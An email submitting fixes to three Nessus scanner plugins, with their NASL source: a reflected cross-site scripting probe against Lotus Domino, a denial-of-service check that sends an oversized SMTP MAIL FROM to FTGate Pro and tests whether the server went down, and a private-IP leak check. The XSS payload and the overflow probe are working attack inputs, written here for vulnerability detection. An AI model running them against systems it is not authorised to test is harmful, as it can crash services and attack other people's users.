Hi,

11394
Here's a new version that uses bodyonly:1

11579
The update you have done is still broken, i.e. destructive test is done in safe mode. The exit(0) went in the wrong place. Fix attached.

10759
Sorry, minor bug introduced by me. The desc["english"] needs to be outside the if(description) block as it is used further down the plugin. Fix attached.

Is there any news on my changes for 10297, 11393 and 10815? I can send the code again if necessary.

Regards,
Paul

-- 
Paul Johnston
Internet Security Specialist
Westpoint Limited
Albion Wharf, 19 Albion Street,
Manchester, M1 5LN
England
Tel: +44 (0)161 237 1028
Fax: +44 (0)161 237 1031
email: paulat_private
web: www.westpoint.ltd.uk


#
# This script is (C) Renaud Deraison
#
# Plugin 11394: reflected cross-site scripting in Lotus Domino.
# Requests a .nsf database path with an HTML tag appended and reports
# when the tag is echoed back, unescaped, in the response body.
#

if(description)
{
  script_id(11394);
  script_version ("$Revision: 1.3 $");
  script_bugtraq_id(2962);
  script_cve_id("CVE-2001-1161");

  name["english"] = "Lotus Domino XSS";
  script_name(english:name["english"]);

  desc["english"] = " The remote server is vulnerable to cross-site scripting, when requesting a .nsf file with html arguments, as in : GET /home.nsf/<img%20src=javascript:alert(document.domain)> Solution : Upgrade to Domino 5.0.8 or newer Risk factor : Medium";
  script_description(english:desc["english"]);

  summary["english"] = "Checks for Lotus Domino XSS";
  script_summary(english:summary["english"]);

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison");
  family["english"] = "CGI abuses";
  family["francais"] = "Abus de CGI";
  script_family(english:family["english"], francais:family["francais"]);

  # domino_default_db.nasl is presumably what fills the www/domino/<port>/db
  # KB entries read below -- verify against that plugin.
  script_dependencie("find_service.nes", "http_version.nasl", "no404.nasl", "domino_default_db.nasl");
  script_require_ports("Services/www", 80);
  script_require_keys("www/domino");
  exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

port = get_kb_item("Services/www");
if(!port)port = 80;
if(!get_port_state(port))exit(0);

# Pick a database to request: a Domino db already recorded in the KB,
# else any .nsf path seen on this port, else the default /home.nsf
# (which may not exist on the target -- hence the remark below).
list = get_kb_list(string("www/domino/", port, "/db"));
if(!isnull(list))
{
  file = list[0];
}
else
{
  list = get_kb_list(string("www/", port, "/content/extensions/nsf"));
  if(!isnull(list))file = list[0];
  else file = "/home.nsf"; # Maybe we'd better exit now.
}

# The tag is sent URL-encoded (%20) and matched decoded (a space): the
# check only fires if the server decodes and reflects it verbatim.
# bodyonly:1 -- presumably restricts the match to the response body so
# that an echo in the headers alone is not counted; confirm in http_keepalive.inc.
req = http_get(item:string(file,"/<img%20src=javascript:alert(document.domain)>"), port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if ( res == NULL ) exit (0);
if("<img src=javascript:alert(document.domain)>" >< res ) security_warning(port);


#
# This script was written by Renaud Deraison <deraisonat_private>
#
# See the Nessus Scripts License for details
#
# Ref:
# From: "Dennis Rand" <derat_private>
# To: "Vulnwatch@Vulnwatch. Org" <vulnwatchat_private>,
# Date: Tue, 6 May 2003 14:57:25 +0200
# Subject: [VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328)
#
# Plugin 11579: FTGate Pro SMTP denial of service.
# Identifies the server from its SMTP banner. With safe checks enabled it
# reports on the banner alone; otherwise it runs the active test and
# reports when the service does not come back afterwards.
#

if(description)
{
  script_id(11579);
  script_version ("$Revision: 1.2 $");

  name["english"] = "FTgate DoS";
  script_name(english:name["english"]);

  desc["english"] = " The remote SMTP server is running FT Gate Pro. There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands. An attacker may use this flaw to prevent this host from processing the mail it should process. Solution : Upgrade to FTgate Pro Mail Server v. 
1.22 Hotfix 1330 Risk Factor : Serious";
  script_description(english:desc["english"]);

  summary["english"] = "Checks for FTgate";
  script_summary(english:summary["english"]);

  # ACT_MIXED_ATTACK: the plugin has both a passive (banner) and a
  # destructive path; which one runs is decided by safe_checks() below.
  script_category(ACT_MIXED_ATTACK);

  script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison", francais:"Ce script est Copyright (C) 2003 Renaud Deraison");
  family["english"] = "Denial of Service";
  script_family(english:family["english"]);
  script_dependencie("find_service.nes");
  script_require_ports("Services/smtp", 25);
  exit(0);
}

#
# The script code starts here
#

include("smtp_func.inc");

port = get_kb_item("Services/smtp");
if(!port)port = 25;

banner = get_smtp_banner(port:port);
if(banner)
{
  if("FTGatePro" >< banner)
  {
    if(safe_checks())
    {
      # Safe mode: report from the banner only and stop. The exit(0) has
      # to be inside this block -- without it the destructive test below
      # would still run in safe mode (the bug the covering mail fixes).
      report = " The remote SMTP server is running FT Gate Pro. There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands. An attacker may use this flaw to prevent this host from processing the mail it should process. *** Since safe checks are enabled, Nessus could not verify this *** flaw nor the version of the remote FTGatePro server, so this *** might be a false positive Solution : Upgrade to FTgate Pro Mail Server v. 
1.22 Hotfix 1330 Risk Factor : Serious";
      security_hole(port:port, data:report);
      exit(0);
    }

    # Active check. The reply to the oversized command is read with a
    # short timeout since the server may not answer at all.
    soc = open_sock_tcp(port);
    if(!soc)exit(0);
    r = smtp_recv_banner(socket:soc);
    send(socket:soc, data:string("HELO there\r\n"));
    r = recv_line(socket:soc, length:4096);
    send(socket:soc, data:string("MAIL FROM: ", crap(2400), "@", crap(2400),".com\r\n\r\n"));
    r = recv_line(socket:soc, length:4096, timeout:1);
    close(soc);

    # Reconnect: a refused connection or a missing banner is taken as the
    # service having gone down. NOTE(review): a transient connection
    # limit on the server would produce the same result -- confirm.
    soc = open_sock_tcp(port);
    if(!soc){ security_hole(port); exit(0); }
    r = smtp_recv_banner(socket:soc);
    if(!r)security_hole(port);
    close(soc);
  }
}


#
# This script was written by Georges Dagousset <georges.dagoussetat_private>
# Modified by Paul Johnston for Westpoint Ltd <paulat_private>
#
# See the Nessus Scripts License for details
#
# Plugin 10759: private (RFC 1918) IP address disclosed in HTTP headers.
#

# Deliberately defined outside if(description): the report built at the
# bottom of the script appends the matched address to this text, so it
# must exist in the non-description run as well (see the covering mail).
desc["english"] = " This web server leaks a private IP address through its HTTP headers. This may expose internal IP addresses that are usually hidden or masked behind a Network Address Translation (NAT) Firewall or proxy server. There is a known issue with IIS 4.0 doing this in its default configuration. See http://support.microsoft.com/support/kb/articles/Q218/1/80.ASP See the Bugtraq reference for a full discussion. 
Risk factor : Low The private IP address is : ";

if(description)
{
  script_id(10759);
  script_cve_id("CAN-2000-0649");
  script_bugtraq_id(1499);
  script_version ("$Revision: 1.8 $");

  name["english"] = "Private IP address leaked in HTTP headers";
  script_name(english:name["english"]);
  script_description(english:desc["english"]);

  summary["english"] = "Checks for private IP addresses in HTTP headers";
  script_summary(english:summary["english"]);

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2001 Alert4Web.com, 2003 Westpoint Ltd");
  family["english"] = "General";
  script_family(english:family["english"]);
  script_dependencie("find_service.nes", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_require_keys("www/iis");
  exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_kb_item("Services/www");
if(!port) port = 80;

#
# Craft our own HTTP/1.0 request for the server banner.
# Note: HTTP/1.1 is rarely useful for detecting this flaw.
#
# Unlike plugin 11394 above there is no get_port_state() check here; a
# closed port is only caught when http_open_socket() fails.
#
soc = http_open_socket(port);
if(!soc) exit(0);
send(socket:soc, data:string("GET / HTTP/1.0\r\n\r\n"));
banner = http_recv_headers(soc);
http_close_socket(soc);

#
# Check for private IP addresses in the banner
# Ranges are: 10.x.x.x, 172.16-31.x.x, 192.168.x.x
#
# NOTE(review): the pattern is not anchored on a non-digit boundary, so a
# longer dotted number that merely contains one of these prefixes (a public
# address such as 110.x.x.x, or a dotted version string) would also match --
# a possible false positive worth confirming before trusting a hit.
# private_ip[0] is the whole match, i.e. the address text that is reported.
#
private_ip = eregmatch(pattern:"(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})", string:banner);
if(!isnull(private_ip))
{
  security_warning(port:port, data:string(desc["english"], private_ip[0]));
}